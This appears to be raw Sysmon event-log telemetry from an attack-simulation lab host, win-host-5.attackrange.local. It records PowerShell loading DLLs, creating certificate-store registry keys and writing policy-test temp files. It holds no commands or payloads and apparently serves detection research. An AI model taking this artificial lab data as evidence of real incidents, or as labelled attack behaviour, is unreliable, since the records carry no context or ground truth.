734700x80000000000000001530733Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\a8f3d26344af855ac6daa7367566ac6a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=B0386808CBC978446F0D8638C53F9F02,SHA256=7E05166D981CF6FA3157EE088305E2B901B9721FCED6370E9D1CE7511A71AC64false-Unavailable 734700x80000000000000001530732Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5trueMicrosoft CorporationValid 734700x80000000000000001530731Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\5351712e9f473d097f2b738b204273dc\System.Transactions.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=B419B44AAD97CA3AA622FC69F9F700EF,SHA256=85E6B77303F3C2B52190AD6ECB73FFF9A6EB42C02D61D315128653B8D806ED7Ffalse-Unavailable 734700x80000000000000001530730Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.733{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\03eb557dfba7aa3116a9751f0bc35bf0\Microsoft.PowerShell.Security.ni.dll10.0.14393.2848Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Security.dllMD5=5BE2CDD8A7DADF9FB9B3F1FF93B2BAA4,SHA256=CBCD70497678A47433F4C5E24A2C801B761F5A551335F827D9C3564FBEE0B40Cfalse-Unavailable 734700x80000000000000001530729Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.733{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=A85C78EB12A7B14526FEBE70EC52184B,SHA256=B240619E85EA26E3412AD8A47D7707509D61A04CAFAEC83325445B62014310D7trueMicrosoft CorporationValid 17141700x80000000000000001530728Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:15.733{21761711-6127-6080-BD5D-00000000BB01}1572\PSHost.132634998155925330.1572.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x80000000000000001530727Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530726Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530725Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530724Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530723Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530722Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530721Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530720Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x80000000000000001530704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qfae2o4a.uku.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 23542300x80000000000000001530703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yxpeu4r5.qkk.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 12241200x80000000000000001530702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 734700x80000000000000001530700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 734700x80000000000000001530698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\27b60a7418e19c1fccb099900e2e182a\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5B8A1387F38B3747F281326AE0AE6046,SHA256=72AFDE4C5841503A8DA13C06C8132644F73CE9B49086AF3B3DDBA5F85FA3D3D4false-Unavailable 734700x80000000000000001530697Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4283 (rs1_release.210303-1802)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=5541A4A7FB64063F8AFB192ABD4DAE70,SHA256=AABF2E6C392F29B77F076BF705976B68B3100138BC63060335BD154B8417754DtrueMicrosoft WindowsValid 734700x80000000000000001530696Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 11241100x80000000000000001530695Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 734700x80000000000000001530694Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4225 (rs1_release.210127-1811)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=37266F6D0E2F86FD3FC6E4724ED49823,SHA256=8AD484F4A7964D2D87047771BB21D3211F204F87D4EB029C1EFAA4FD935333B1trueMicrosoft WindowsValid 23542300x80000000000000001530693Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22364F316763F47D69DEBE53A28653F4,SHA256=0AAD522309C2A31D8D76669BD16FA4128A13A08EDF3995A309EC37950DD21FC7falsefalse - insufficient disk space 13241300x80000000000000001530692Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530691Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 13241300x80000000000000001530690Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530689Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530688Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 13241300x80000000000000001530685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 734700x80000000000000001530683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValid 734700x80000000000000001530682Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.3986 (rs1_release.201002-1707)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=601EDCF334B3DA561BE85560BFAB4831,SHA256=69422D4F7B2E9673178761052D25718F2F1F1D7D5B0962798ECAC66C123FB207trueMicrosoft WindowsValid 734700x80000000000000001530681Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4350 (rs1_release.210407-2154)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=D847084F61752DB23D027FFC3CBEF8F7,SHA256=2061D01C7612A6010BDD83E0BB339A1040C8077595AD7A51C9E3ADC4B501B4BFtrueMicrosoft WindowsValid 734700x80000000000000001530680Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\a9817b0436b3d1ea69912071b1772668\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=277A874D3C7FAF514D476913C562779E,SHA256=B0EBBA50E089358BBE363BB14DE6D80AB1F92F52C30C8FE13BC4358C8BB252B1false-Unavailable 12241200x80000000000000001530679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\497f2b8232570a09da6c199ca8afab42\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=1C9EB8C8F79E7AE6D1837A92AEA937C9,SHA256=3FDBD432E9BD0A40D636E64FED0E27AFA7AFE8EC8DFBAF1CEB0E02CF9D45E191false-Unavailable 12241200x80000000000000001530677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x80000000000000001530676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x80000000000000001530675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x80000000000000001530674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530665Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530664Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 